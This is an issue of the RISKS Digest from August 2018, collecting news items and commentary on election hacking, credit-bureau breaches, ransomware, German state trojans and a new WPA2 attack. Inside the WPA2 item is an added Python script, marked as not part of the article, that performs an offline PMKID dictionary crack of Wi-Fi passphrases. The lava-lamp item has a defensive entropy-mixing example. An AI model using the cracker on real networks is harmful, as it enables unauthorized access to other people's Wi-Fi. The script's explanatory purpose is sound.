The RISKS Digest
Volume 30 Issue 79

Wednesday, 8th August 2018

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Contents

The Midterm Elections Are in Serious Danger of Being Hacked, Thanks to Trump
Mother Jones
West Virginia to introduce mobile phone voting for midterm elections
Money.CNN
Election screw-up
McClatchy
Traceability
Vint Cerf
Putin is afraid of one thing ...
Michael Morell
FBI charges 3 Ukrainians with hacking U.S. chains, stealing customers' credit card data.
WashPo
Old credit-bureau breaches
The New York Times
Tech Company Sees Autonomous GA Aircraft
Russ Niles
2 Blasts, a Stampede and a 'Flying Thing': Witnesses Tell of Attack on Maduro
NYTimes
An Alaskan borough turns to typewriters and handwriting after its computers were hacked
WashPo
HP Inkjet Printers Remote CodeEx
HP
"German police hacking hit by volley of complaints: Can 'state trojan' law survive?"
ZDnet
Disney's 'Christopher Robin' Won't Get China Release Amid Pooh Crackdown
Hollywood Reporter
South Korea longs for a train to Europe but U.S. sanctions on North Korea block the way
WashPo
Magical thinking about machine learning won't bring the reality of AI any closer
The Guardian
Keeping Zuckerberg Safe Now Costs an Extra $10 Million a Year
Bloomberg
Your Company Needs a Digital Ombudsman. Pronto.
Medium
To Fight Fake News, SETI Researchers Update Alien-Detection Scale
SciAm
An Alaskan borough turns to typewriters and handwriting after its computers were hacked.
WashPo
UK F-35 secrets said leaked after Tinder account hacked
The Times of Israel
"New Wi-Fi attack cracks WPA2 passwords with ease"
Charlie Osborne
How a bunch of lava lamps protect us from hackers
WiReD
The Information on School Websites Is Not as Safe as You Think
NYTimes
Rich Irony from an "Unwitting" Liar
Henry Baker
Socially engineering a whale ...
Rob Slade
Re: The Ordinary License Plate's Days May Be Numbered
Wol
Re: Employees as subjects in clinical trials
Robert R. Fenichel
Info on RISKS (comp.risks)

The Midterm Elections Are in Serious Danger of Being Hacked, Thanks to Trump (Mother Jones)

Gabe Goldberg <gabe@gabegold.com>
Fri, 3 Aug 2018 18:56:20 -0400
*As President Barack Obama* prepared to leave office, his administration had
no doubt that Russia had mounted a devastating disinformation campaign and
hacked our electoral systems—and would likely do it again.  But
President-elect Donald Trump was notably uninterested in the threat. When
FBI Director James Comey and other leaders of the intelligence community
visited Trump Tower in January 2017 to explain how the country had been
attacked, Comey recalled in his memoir, Trump's team had “no questions
about what the future Russian threat might be.''  Instead, Comey wrote, they
launched “immediately into a strategy session ... about how they could spin
what we'd just told them.''

The meeting set the tone for the administration. After four months as
attorney general, Jeff Sessions told the Senate he had not once been briefed
on Russian election interference, even though his department oversees the
FBI, which investigates Russia's disinformation campaigns and hacks like the
one in Illinois. When John Bolton took over as national security adviser in
April, he promptly pushed out two top White House cybersecurity experts. In
May, Homeland Security Secretary Kirstjen Nielsen, whose department also
plays a leading role in election security, told reporters she wasn't aware
of US intelligence agencies having found that Russia aimed to help Trump;
she made similar remarks at a July security conference. The White House has
acknowledged just one Cabinet-level meeting on election security, and it
didn't come until May.

SOURCES:
<http://www.dni.gov/files/documents/ICA_2017_01.pdf>
<http://time.com/4817199/jeff-sessions-testimony-russia-investigation-briefing/>
<http://www.c-span.org/video/?c4742826/nielsen-question-russian-support-trump>
<http://www.huffingtonpost.com/entry/kirstjen-nielsen-homeland-security-trump-russia_us_5b50ad1ce4b0fd5c73c30dfa>
<http://www.whitehouse.gov/briefings-statements/readout-president-donald-j-trumps-meeting-regarding-election-security/>
http://www.motherjones.com/politics/2018/07/the-midterm-elections-are-in-serious-danger-of-being-hacked-thanks-to-trump/


West Virginia to introduce mobile phone voting for midterm elections (Money.CNN)

Gabe Goldberg <gabe@gabegold.com>
Tue, 7 Aug 2018 19:43:28 -0400
West Virginians serving overseas will be the first in the country to cast
federal election ballots using a smartphone app, a move designed to make
voting in November's election easier for troops living abroad. But election
integrity and computer security experts expressed alarm at the prospect of
voting by phone, and one went so far as to call it "a horrific idea." ...

Ballots are anonymized, the company says, and recorded on a public digital
ledger called blockchain. Although that technology is most often associated
with Bitcoin and other cryptocurrencies, it can be used to record all manner
of data.

http://money.cnn.com/2018/08/06/technology/mobile-voting-west-virginia-voatz/index.html

Oh, it's blockchain-based. OK, then.

  [See http://xkcd.com ...  PGN]


Election screw-up (McClatchy)

"Peter G. Neumann" <neumann@csl.sri.com>
Wed, 8 Aug 2018 5:16:09 PDT
http://www.mcclatchydc.com/news/politics-government/article216056560.html

"670 ballots in a precinct with 276 voters, and other tales from Georgia's
primary"


Traceability (Vint Cerf)

Lauren Weinstein <lauren@vortex.com>
Sun, 5 Aug 2018 16:53:53 -0700
NNSquad
http://cacm.acm.org/magazines/2018/8/229771-traceability/fulltext

  "This suggests to me that the notion of traceability under
  (internationally?) agreed circumstances (that is, differential
  traceability) might be a fruitful concept to explore. In most societies
  today, it is accepted that we must be identifiable to appropriate
  authorities under certain conditions (consider border crossings, traffic
  violation stops as examples). While there are conditions under which
  apparent anonymity is desirable and even justifiable (whistle-blowing, for
  example) absolute anonymity is actually quite difficult to achieve
  (another point made at the Ditchley workshop) and might not be absolutely
  desirable given the misbehaviors apparent anonymity invites. I expect this
  is a controversial conclusion and I look forward to subsequent
  discussion."   Vint Cerf

While I have frequently called for greater accountability in key aspects of
Internet operations (in particular, public access to WHOIS domain data
except in limited circumstances), I fear that in the general case Vint's
Traceability proposal would mostly gladden the hearts of bad governmental
players in countries such as China, Russia, and even here in the USA. It
basically amounts to an escrowed identity system, a concept that has been
widely and appropriately criticized in the encryption arena. Given that a
significant degree of anonymity is crucial for human rights advocates and
others who live in areas of the world that are routinely under government
oppression, I do not see obvious ways that Vint's proposal could be
implemented without innocent parties being even more at the mercy of
oppressive governments than they are today.


Putin is afraid of one thing ... (Michael Morell)

"Peter G. Neumann" <neumann@csl.sri.com>
Wed, 8 Aug 2018 10:35:20 -0700
Putin is afraid of one thing. Make him think it could happen.
Michael Morell, *The Washington Post*, 7 Aug 2018
http://www.washingtonpost.com/opinions/putin-is-afraid-of-one-thing-make-him-think-it-could-happen/2018/08/07/edbe08b4-998b-11e8-b60b-1c897f17e185_story.html

Facebook revealed on 31 Jul 2018 that it had discovered a 17-month-long
influence campaign to sow political divisiveness on its network, an effort that
bore the hallmarks of the Kremlin-connected Internet Research Agency.  Two
days later at the White House, the nation's top national security officials
said Russia is conducting a pervasive campaign to weaken our democracy and
influence this year's midterm elections. Taken together, these announcements
leave no doubt that Russian President Vladimir Putin's political assault on
the United States continues unabated.

The most important question the Trump administration and Congress should be
asking is: How can we make Putin stop? Finding the answer is essential
because what Washington has done so far—some improvements in defending
against these attacks, along with a mixture of targeted sanctions against
Russia, the indictment of Russian officials and organizations as well as the
expulsion of Russian intelligence officers from the United States—has not
worked.

Stopping Putin is vital, not just as a matter of protecting American
democracy from Russian interference but also because we must signal a
stronger deterrence to other adversaries, such as China, Iran and North
Korea. Potential aggressors must be shown they will pay a price if they
attack. With better resources than Russia for trying to undermine our
democracy, China, in particular, needs to know that the United States would
respond by imposing a heavy cost.

The U.S. answer to Russia, so far, has been ineffective because Washington
has targeted only the entities and individuals actually involved in the
Russian information operations. Since the 2016 election, the United States,
at various times, has imposed sanctions on at least 10 Russian organizations,
some more than once, and at least 23 specific individuals. Because the
sanctions' targeting has had little impact on the Russian economy overall,
the political effect on Putin has been minor.

Here is what the United States needs to do. In terms of self-defense, it
must secure the nation's elections system, especially the software that
holds data on registered voters. Every vote should be tallied on a backup
paper ballot that could be used to verify election results, if
necessary. New rules and better enforcement are needed to keep foreign money
out of U.S. elections. The federal government should work with individual
campaigns to fortify the security of the technology and networks they
use. Finally, better coordination across the government is needed to protect
U.S. elections, which would probably best be achieved by creating a Hybrid
Threats Center similar to the National Counterterrorism Center.

There are several bills in Congress, all with support on both sides of the
aisle, that would institute most of these changes and pay for them, but the
legislation is frozen by the partisanship this issue stirs.

As for imposing costs on those who attack the United States: Fully implement
sanctions already on the books. That is still not happening. But then move
beyond targeted sanctions to broad-based sanctions that are designed to hurt
the Russian economy—just as the Obama administration's sanctions against
Iran were designed to do, as are the Trump administration's.  Make it clear
to Putin that we would drop the sanctions when he stopped interfering in the
democratic institutions of the United States and its allies, some of which
are also under siege.

What would such sanctions look like? A Senate bill introduced on 2 Aug 2018,
again with sponsors from both parties, is a good start: Prohibit any
transaction related to Russian energy projects and bar the purchase of new
Russian sovereign debt. Washington should encourage its allies to join in
these efforts.

Putin is afraid of one thing. He is afraid that one day the Russian middle
class will finally rebel against his regime and rush into the streets
demanding change.  It happened in Tunis, Cairo and other Middle Eastern and
North African cities between 2010 and 2012, and it happened most alarmingly,
from Putin's perspective, four years ago in Kiev when Ukrainians threw out a
government beholden to Moscow. Sanctions that bite at the heart of the
Russian economy—sanctions that increase the risk that Russia's middle
class will become restive—will get Putin's attention.

The leaders that the United States has chosen, and the security experts they
have appointed and confirmed, are aware of the threat. A failure to defend
the nation as well as possible, and failure to impose severe costs on those
attacking our democracy, would be seen by history as a major abdication of
responsibility. The statements from intelligence officials at the White
House last week were an excellent first step. More steps, and stronger ones,
are urgently needed.

  Michael Morell, a career intelligence officer, served as the deputy
  director of the Central Intelligence Agency from 2010 to 2013; during that
  period, he served twice as acting CIA director. He is the host of the
  Intelligence Matters podcast.

    [Edited for RISKS.  The original has a slew of subtended URLs.  PGN]


FBI charges 3 Ukrainians with hacking U.S. chains, stealing customers' credit card data. (WashPo)

Monty Solomon <monty@roscom.com>
Thu, 2 Aug 2018 01:42:00 -0400
FBI charges 3 Ukrainians with hacking U.S. chains, stealing customers'
credit card data

A group called FIN7 allegedly stole the numbers of an estimated 15 million
cards in a long-running scheme.

http://www.washingtonpost.com/world/national-security/fbi-charges-ukrainians-with-hacking-us-chains-stealing-customers-credit-card-data/2018/08/01/7b74badc-95bc-11e8-a679-b09212fb69c2_story.html


Old credit-bureau breaches (The New York Times)

José María Mateos <chema@rinzewind.org>
Sun, 5 Aug 2018 17:55:32 -0400
These days I have been reading "Creditworthy: A History of Consumer
Surveillance and Financial Identity in America". It is an excellent study of
how the credit bureau / data broker industry started in the United States of
America.

I was amused by the inclusion of the following news item, which could have
been published yesterday:

http://www.nytimes.com/1984/06/22/business/credit-file-password-is-stolen.html

"Credit File Password Is Stolen", New York Times, June 22nd, 1984.

A password that could permit access to the credit histories of 90 million
people was stolen and posted on an electronic bulletin board, TRW
Information Systems said yesterday.

[...] TRW, the nation's largest credit reporting company, said its files had
been breached by someone who stole a password from a Sears, Roebuck &
Company store on the West Coast. The credit company said it changed the
password immediately after being told of the breach by an informant two
weeks ago.

The password could have been illegally used for a month, at most, and
probably a week, said Geri L. Schanz, a TRW spokesman. She said there was no
indication that merchandise was illegally charged. A preliminary examination
of the Sears account determined no unusual activity; a store is billed each
time its password is used and billings have not been higher than normal.
Miss Schanz added that the intruders would not have been able to change
information on the computer files.

But TRW is conducting an intensive investigation to find out who breached
the system and how. Ernest L. Arms, a spokesman for Sears in Chicago, said
his company was ''concerned'' about the TRW incident, but he would supply no
further details.

Computer experts yesterday said the breach again raises the issue of whether
the nation's companies and consumers are adequately protected.

Yes, it definitely raised the issue.

José María (Chema) Mateos


Tech Company Sees Autonomous GA Aircraft (Russ Niles)

Gabe Goldberg <gabe@gabegold.com>
Mon, 6 Aug 2018 13:48:30 -0400
http://cdn.avweb.com/media/newspics/325/p1ck69odbj45312341mkikeb1ecv6.jpeg

Forget that shiny new octocopter, a Bay-area startup wants to make your
Cessna 172 autonomous. XWing says
<http://medium.com/xwing/hello-from-xwing-b25451771a61> "plug and play"
software that can make most light aircraft fly autonomously. Details on how
it works have not been released but the technology will revolve around
"sensing, reasoning and control," according to aviation tech website
TransportUP
<http://transportup.com/headlines-breaking-news/vehicles-manufactures/automated-flight-startup-xwing-raises-4-million-in-funding/>
It will also work on helicopters and multicopters but its designer sees its
main benefit as making GA [General Aviation] accessible to the
masses. According to XWing founder Marc Piette the key is getting rid of
pilots.[*]  “Getting a license and maintaining proficiency even on a single
[-engine] aircraft type is time consuming and challenging,'' he said in a
post on his website. “Removing the need for a pilot will have a significant
impact in opening up the aviation market.''

Piette says that by eliminating pilots more people will be attracted to
aircraft ownership and that will increase demand for small planes. The
higher volumes will reduce production costs and make GA aircraft more
affordable, Piette theorizes. “We see a bright future where people and
places are ever more connected, where small aircraft can finally take their
rightful place in the transportation landscape, and where autonomous flight
will have a profound impact on society as we know it,'' he wrote. Apparently
some investors are seeing that bright future as TransportUP is reporting
XWing has attracted $4 million in initial investment, including some from
Microsoft.

  * [NOTE: The purpose of drones is to get rid of pilots and passengers.
    But someone has to be around to take the `blame' when something goes
    wrong...  PGN]


2 Blasts, a Stampede and a 'Flying Thing': Witnesses Tell of Attack on Maduro (NYTimes)

Monty Solomon <monty@roscom.com>
Mon, 6 Aug 2018 01:38:14 -0400
http://www.nytimes.com/2018/08/05/world/americas/venezuela-drone-attack-nicolas-maduro.html

A drone attack that failed to kill President Nicolas Maduro of Venezuela
unfolded on live TV and in front of many witnesses: “It was like, bang, I
had never heard a sound like that in my life.''


An Alaskan borough turns to typewriters and handwriting after its computers were hacked (WashPo)

Richard M Stein <rmstein@ieee.org>
Thu, 02 Aug 2018 13:10:02 +0800
http://www.washingtonpost.com/technology/an-alaskan-borough-turns-to-typewriters-and-handwriting-after-its-computers-were-hacked/2018/08/01/7689dafa-ab56-4e03-9677-556fc970e3ea_story.html

Sage advice to adopt for any organization seeking resilience against
ransomware opportunism. Paper files stored in filing cabinets and cooked by
typewriters are immune from ransomware or DNS tunneling exfiltration, but
not fire or black bag ops (breaking & entering + theft).


HP Inkjet Printers Remote CodeEx (HP)

Gabe Goldberg <gabe@gabegold.com>
Tue, 7 Aug 2018 17:07:27 -0400
Two security vulnerabilities have been identified with certain HP Inkjet
printers.  A maliciously crafted file sent to an affected device can cause a
stack or static buffer overflow, which could allow remote code execution.

http://support.hp.com/us-en/document/c06097712


"German police hacking hit by volley of complaints: Can 'state trojan' law survive?" (ZDnet)

Gene Wirchenko <genew@telus.net>
Wed, 08 Aug 2018 11:05:07 -0700
Germany's use of state-sponsored malware to fight crime is under fire from
several sides.
http://www.zdnet.com/article/german-police-hacking-hit-by-volley-of-complaints-can-state-trojan-law-survive/

Civil rights activists and politicians will in the coming days launch a
volley of constitutional complaints against the German government over its
use of state-sponsored malware in criminal investigations.

The first is that the recent law does not respect the boundaries set by the
Constitutional Court in a 2008 ruling, which said state-sponsored malware,
Staatstrojaner, can only be used to monitor ongoing communications, and not
to search people's computers.

The second part of the GFF's argument is that “there is an indirect
detrimental effect on IT security as a whole.''

Ulf Buermeyer, the organization's chairman, said: “To use one of these
state-sponsored malwares, authorities usually need a security flaw in the
system they want to target. These flaws can not only be exploited by German
state actors, but also by foreign state actors, or by plain criminals.  We
argue that trojans are detrimental to our security in general.  It creates a
strong incentive for state actors in Germany not to disclose security flaws
to vendors. We say this is a risk and the German legislature entirely
neglected this risk.''


Disney's 'Christopher Robin' Won't Get China Release Amid Pooh Crackdown (Hollywood Reporter)

Lauren Weinstein <lauren@vortex.com>
Mon, 6 Aug 2018 11:52:13 -0700
http://www.hollywoodreporter.com/heat-vision/christopher-robin-refused-china-release-winnie-pooh-crackdown-1131907

  A source pins the blame on the country's crusade against images of the
  Winnie the Pooh character, which has become a symbol of the resistance
  with foes of the ruling Communist Party, namely Chinese leader Xi Jinping.

China's censorship regime isn't just oppressive and evil, it's utterly
insane.


South Korea longs for a train to Europe but U.S. sanctions on North Korea block the way (WashPo)

Gabe Goldberg <gabe@gabegold.com>
Tue, 7 Aug 2018 17:11:54 -0400
The Washington Post, 3 Aug 2018

During their meeting in the peninsula's demilitarized zone in late April,
South Korean President Moon Jae-in handed Kim a USB stick containing
detailed plans for an inter-Korean rail network. The two Korean leaders
agreed to work toward reconnecting their rail network, built under Imperial
Japan at the turn of the 20th century, then severed during the Korean War in
the 1950s.

http://www.washingtonpost.com/world/asia_pacific/south-korea-longs-for-a-train-to-europe--but-us-sanctions-on-north-korea-block-the-way/2018/08/03/1760ef76-9007-11e8-9b0d-749fb254bc3d_story.html

Moon better hope Kim doesn't read Risks.


Magical thinking about machine learning won't bring the reality of AI any closer (The Guardian)

"Dave Farber" <farber@gmail.com>
Sun, 5 Aug 2018 19:17:47 +0900
http://www.theguardian.com/commentisfree/2018/aug/05/magical-thinking-about-machine-learning-will-not-bring-artificial-intelligence-any-closer


Keeping Zuckerberg Safe Now Costs an Extra $10 Million a Year. (Bloomberg)

Monty Solomon <monty@roscom.com>
Sun, 5 Aug 2018 13:04:43 -0400
http://www.bloomberg.com/news/articles/2018-08-02/protecting-mark-zuckerberg-just-got-more-expensive-for-facebook


Your Company Needs a Digital Ombudsman. Pronto. (Medium)

Lauren Weinstein <lauren@vortex.com>
Sun, 5 Aug 2018 09:31:23 -0700
via NNSquad
http://medium.com/s/story/your-company-needs-a-digital-ombudsman-pronto-9454c61c273b

  Who Needs this Role? Google famously convened an ethics board to ruminate
  over the possible dangers A.I. poses for the future. That's admirable from
  a Let's-Avoid-the-Robopocalypse perspective, but Google needs this
  position of digital ombudsman to focus on their users' concerns now. (A
  quick Google search reveals that I'm not the first to suggest it.)
  Facebook needs this position. So does Twitter. And Snapchat.  And
  Amazon. But the need extends well beyond these obvious digital and social
  media companies.

One of the best articles I've seen on this topic in ages. And before anyone
points it out, yeah, I did notice that it links back to my earlier
discussions (updated many times over the years) regarding Google and
Ombudsmen, via a link to a Techdirt article that I've previously noted.


To Fight Fake News, SETI Researchers Update Alien-Detection Scale (Scientific American)

Richard M Stein <rmstein@ieee.org>
Sun, 05 Aug 2018 18:39:39 +0800
http://www.scientificamerican.com/article/to-fight-fake-news-seti-researchers-update-alien-detection-scale/

SETI has created a new calculator to assess ET's signal to Earth. The
calculator uses enumerated input values, with a few range selection options,
to characterize the signal structure.

The ET-for-real-calculator can be found here: 
  http://dh4gan.github.io/rioscale2/. 

A peer-reviewed article published in the International Journal of
Astrobiology article discusses the Rio2.0 scale, a method to
characterize ET's signal as calculator input.

I think the risk here, common to all software stacks, is whether or not
it has been sufficiently qualified, especially for edge/threshold-
trigger conditions that might accrue into an accidental public alarm.

Hopefully, there'll be a few conscientious reviewers to evaluate the
signal and calculator output before an emergency broadcast commences.

Wonder if an adaptation can be automatically applied to various public
information sources (e.g., social media platforms) to quickly identify
bot publications w/o compromising free speech? The EditorBot might live
someday.


An Alaskan borough turns to typewriters and handwriting after its computers were hacked. (WashPo)

Monty Solomon <monty@roscom.com>
Thu, 2 Aug 2018 01:42:53 -0400
A ransomware attack infected the town's computers and email system, forcing
officials to pull them offline.

http://www.washingtonpost.com/technology/2018/08/01/an-alaskan-borough-turns-typewriters-handwriting-after-its-computers-were-hacked/


UK F-35 secrets said leaked after Tinder account hacked (The Times of Israel)

Gabe Goldberg <gabe@gabegold.com>
Mon, 6 Aug 2018 12:22:36 -0400
A British Royal Air Force airwoman had her Tinder dating account hacked,
leading to secrets about the country's new F-35 fighter jets being leaked,
according to a Sunday report in the UK's Daily Mail
<http://www.dailymail.co.uk/news/article-6027207/Honeytrap-spy-stole-secrets-new-RAF-stealth-jet-hacking-Tinder-profile.html>

The RAF confirmed to the Mail that some information about the top secret
planes was passed on to a third party after the woman's profile was
hacked. The perpetrator used her account to strike up an online friendship
with another member of the air force.

http://www.timesofisrael.com/uk-f-35-secrets-said-leaked-after-tinder-account-hacked/


"New Wi-Fi attack cracks WPA2 passwords with ease" (Charlie Osborne)

Gene Wirchenko <genew@telus.net>
Wed, 08 Aug 2018 11:23:42 -0700
Charlie Osborne for Zero Day | August 8, 2018
The common Wi-Fi security standard is no longer as secure as you think.
http://www.zdnet.com/article/new-wi-fi-attack-cracks-wpawpa2-passwords-with-ease/

A new way to compromise the WPA/WPA2 security protocols has been
accidentally discovered by a researcher investigating the new WPA3 standard.

The attack technique can be used to compromise WPA/WPA2-secured routers and
crack Wi-Fi passwords which have Pairwise Master Key Identifiers (PMKID)
features enabled.
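The reason a single PMKID is enough for an offline crack, as an added
worked example that is not part of the ZDNet article or the researcher's
own code: for WPA2-Personal the PMK is just PBKDF2-HMAC-SHA1(passphrase,
SSID, 4096 iterations, 32 bytes), and the PMKID the access point sends in
the first EAPOL frame (when PMK caching is enabled) is HMAC-SHA1-128(PMK,
"PMK Name" || AP MAC || station MAC). Both MAC addresses and the SSID are
visible on the air, so the passphrase is the only unknown and each
dictionary candidate costs one PBKDF2 plus one HMAC, with no client
handshake to capture. The SSID, MAC addresses and wordlist below are
constructed for the demonstration.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed sample network: made-up SSID and locally administered MACs,
# not values from any real access point.
SSID = "RISKSnet"
AP_MAC = bytes.fromhex("02aabbccddee")   # AA: the authenticator (AP) address
STA_MAC = bytes.fromhex("021122334455")  # SPA: the supplicant (client) address
WORDLIST = ["password", "letmein", "Summer2018!", "correct horse"]


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with
    the SSID, 4096 iterations, 256-bit output (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16
    bytes of HMAC-SHA1 keyed with the PMK over the fixed label and both MACs."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def crack_pmkid(captured: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes,
                candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the PMKID for each candidate
    passphrase and return the first one that matches the captured value."""
    for cand in candidates:
        guess = pmkid(wpa2_pmk(cand, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, captured):
            return cand
    return None


def capture_from_ap(passphrase: str) -> bytes:
    """Stand-in for sniffing: computes what the AP would put in the RSN
    PMKID field of its first EAPOL frame for the network above."""
    return pmkid(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC)


if __name__ == "__main__":
    captured = capture_from_ap("Summer2018!")
    print("captured PMKID:", captured.hex())
    print("recovered passphrase:",
          crack_pmkid(captured, SSID, AP_MAC, STA_MAC, WORDLIST))
```

The only defence this leaves on WPA2-Personal is a passphrase that is not
in any wordlist: the cost per candidate is fixed by PBKDF2 at 4096
iterations, and nothing in the protocol limits how many candidates an
attacker tries offline.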


How a bunch of lava lamps protect us from hackers (WiReD)

Gabe Goldberg <gabe@gabegold.com>
Tue, 7 Aug 2018 18:39:58 -0400
Edward Craven Walker lived to see his greatest invention, the lava lamp
<http://www.wired.com/2013/09/lava-lamp-50/>, make a cultural comeback. But the
British tinkerer (and famed nudist, incidentally) died before he could
witness the 21st-century digital potential of his analog creation. Inside
the San Francisco office of the web security company Cloudflare
<http://www.wired.com/tag/cloudflare/>, groovy hardware helps protect wide
swaths of the Internet from infiltration.

Here's how it works. Every time you log in to any website, you're assigned a
unique identification number. It should be random, because if hackers can
predict the number, they'll impersonate you. Computers, relying as they do
on human-coded patterns, can't generate true randomness—but nobody can
predict the goopy mesmeric swirlings of oil, water, and wax. Cloudflare
films the lamps 24/7 and uses the ever-changing arrangement of pixels to
help create a superpowered cryptographic key. “Anything that the camera
captures gets incorporated into the randomness,'' says Nick Sullivan, the
company's head of cryptography <http://www.wired.com/tag/cryptography/>. That
includes visitors milling about and light streaming through the windows.
(Any change in heat subtly affects the undulations of those glistening
globules.)

Sure, *theoretically*, bad guys could sneak their own camera into
Cloudflare's lobby to capture the same scene, but the company's prepared for
such trickery. It films the movements of a pendulum in its London office and
records the measurements of a Geiger counter in Singapore to add more chaos
to the equation. Crack that, Russians.

http://www.wired.com/story/cloudflare-lava-lamps-protect-from-hackers/
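The property the article is describing, as an added example that is not
Cloudflare's code or the Wired piece's own: several independent sources
(camera frames, a pendulum, a Geiger counter) are mixed into one seed by
hashing them with a tag and a length prefix per source, and session
identifiers are then derived from that seed. The point of the extra
sources is that an attacker who reproduces one of them (filming the same
lobby) still cannot recompute the seed unless every source is known, so
a single flipped bit in the Geiger readings changes the whole output. The
byte strings standing in for the three sources are constructed.

```python
import hashlib
import hmac

# Constructed stand-ins for the three physical sources in the article;
# real inputs would be raw camera frames, pendulum readings and Geiger counts.
SF_CAMERA = bytes(range(256)) * 4          # a frame an attacker in the lobby could also film
LONDON_PENDULUM = b"\x12\x34\x56\x78" * 8
SINGAPORE_GEIGER = b"\x0f\xa1\x03\x9c" * 8


def mix_entropy(sources: dict) -> bytes:
    """Fold independent entropy sources into one 32-byte seed with SHA-256.
    Sources are processed in a fixed order and each one is tagged with its
    name and length-prefixed, so {"camera": b"ab", "geiger": b"c"} and
    {"camera": b"a", "geiger": b"bc"} cannot collide."""
    h = hashlib.sha256()
    for name in sorted(sources):
        data = sources[name]
        h.update(name.encode() + b"\x00" + len(data).to_bytes(8, "big") + data)
    return h.digest()


def session_id(seed: bytes, counter: int) -> str:
    """Per-login identifier derived with HMAC-SHA256 from the seed and a
    counter: seeing one identifier reveals neither the seed nor the next id."""
    return hmac.new(seed, counter.to_bytes(8, "big"), hashlib.sha256).hexdigest()


def real_seed() -> bytes:
    """Seed computed from all three sources, as the operator sees them."""
    return mix_entropy({"camera": SF_CAMERA,
                        "pendulum": LONDON_PENDULUM,
                        "geiger": SINGAPORE_GEIGER})


def attacker_seed(geiger_guess: bytes) -> bytes:
    """Seed an attacker can compute after filming the lobby and somehow
    learning the pendulum readings, but having to guess the Geiger data."""
    return mix_entropy({"camera": SF_CAMERA,
                        "pendulum": LONDON_PENDULUM,
                        "geiger": geiger_guess})


if __name__ == "__main__":
    seed = real_seed()
    print("seed:", seed.hex())
    print("session id #1:", session_id(seed, 1))
    print("attacker matches seed:", attacker_seed(b"\x00" * 32) == seed)
```

In production such readings are fed into the operating system's entropy
pool rather than used to derive identifiers directly; the hash-and-prefix
step is the same, and it is what makes the output as unpredictable as the
least predictable source rather than the most.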


The Information on School Websites Is Not as Safe as You Think (NYTimes)

Monty Solomon <monty@roscom.com>
Sat, 4 Aug 2018 02:34:09 -0400
Some tracking scripts may be harmless. But others are designed to recognize
I.P. addresses and embed cookies that collect information prized by
advertisers.
http://www.nytimes.com/2018/08/02/education/learning/school-websites-information-tracking.html


Rich Irony from an "Unwitting" Liar

Henry Baker <hbaker1@pipeline.com>
Sat, 04 Aug 2018 15:24:15 -0700
Is it just me, or is anyone else in computer science annoyed by James
Clapper's recent apology book tour, during which he blames everyone but the
intelligence community for Hillary Clinton's 30,000 lost emails?

Having been involved in the computer science field for half a century, with
a personal email history almost as old, I can recall the heavy hand of the
intelligence community in monopolizing encryption technology and
criminalizing its export.  The intelligence community's watchword: "NOBUS",
meaning "NObody But U.S." (may use high-quality encryption and
authentication).

This heavy hand made it impossible to incorporate encryption and
authentication into the fabric of everyday computer systems, and hence
impossible for computers to *routinely* protect ordinary communications like
emails.

Only after Bernstein v. United States (1999) and Junger v. Daley (2000) was
encryption finally permitted to become a fully integrated component of
everyday computer systems.

The computer science community thus lost *forty years* of experience and
software development that would have led to email systems capable of storing
Hillary's emails securely—even in her home closet.

As the recent "Spectre" class of CPU vulnerabilities demonstrates, we are
still living with legacy of this intelligence community "unwitting" (I
prefer "witless") blunder.

I would like to repeat to James Clapper what my grandmother used to say to
me when I was a child: "when you point your (index) finger at someone, your
other four fingers are pointing at yourself."

I also have a better suggestion for the name of Clapper's book:

  "Redacts and Sneers: Half Truths from a Liar in Intelligence"

rather than

  "Facts and Fears: Hard Truths from a Life in Intelligence"

http://news.harvard.edu/gazette/story/2018/06/clapper-frets-over-past-damage-present-shortcomings-future-threats-to-us-intelligence/

Christina Pazzanese Harvard Staff Writer   22 Jun 2018
The worries over U.S. intelligence

Former Director of National Intelligence James Clapper says he felt
compelled to speak out about President Trump and the investigation
into Russia's interference in the 2016 election.


Socially engineering a whale ...

Rob Slade <rmslade@shaw.ca>
Fri, 3 Aug 2018 12:45:52 -0700
When you know who someone is, have followed their patterns, and know who
their friends are, you can get them to respond to phishing messages.

At least, that was the theory when DFO lured an orca away from the harbour
where he had taken up residence.  (And now someone is going to take issue
with "residence," since he was not from one of the resident pods, but was a
transient.)
http://vancouversun.com/news/local-news/orca-lured-from-comox-harbour-with-audio-playback-of-other-whales or
http://is.gd/WHuq3X

(And, yes, I know that orcas are delphinidae and therefore not true whales ...)

(And, yes, I meant phishing, not fishing.)

(false positive, identification, identity theft, impersonation, phishing,
social engineering, social media)

(Oh, you want even more links to security?  Well, there is life safety,
since transients feed on mammals, and that's what we are ...)

(See also under "bears": http://catless.ncl.ac.uk/Risks/30/76#subj21)


Re: The Ordinary License Plate's Days May Be Numbered (Shapir, RISKS-30.78)

Wols Lists <antlists@youngman.org.uk>
Thu, 2 Aug 2018 19:29:39 +0100
It always amazes me not many countries follow the UK approach, where in
normal circumstances the licence plate stays with the vehicle from
manufacture to destruction.

And I'm sure plenty of people will scream about the risks of ANPR (automatic
number plate recognition) but it works well - mostly - for us where a
computer in a police car scans neighbouring plates, then checks them against
an online database for tax and insurance. Traders have a special plate which
allows them to drive vehicles that are otherwise not registered, taxed or
insured.

This does, however, bring another risk into play. So many bills are paid
monthly now, including insurance, so if you aren't alert it's far too easy -
as happened to my daughter - for the insurance debit to bounce, the
insurance company cancels the policy, the ANPR picks up your vehicle, and
you get stopped for driving the vehicle without insurance.  And the
insurance company normally does NOT notify you that the payment bounced! In
those circumstances, you are supposed either to re-insure your vehicle, at
the roadside, by (smart)phone or the police will seize the vehicle. My
daughter was lucky - the police let her proceed when she couldn't contact
her insurers but many people have had their vehicle seized and it usually
costs about £200 to get it back!


Re: Employees as subjects in clinical trials (Maziuk)

"Robert R. Fenichel" <bot@fenichel.net>
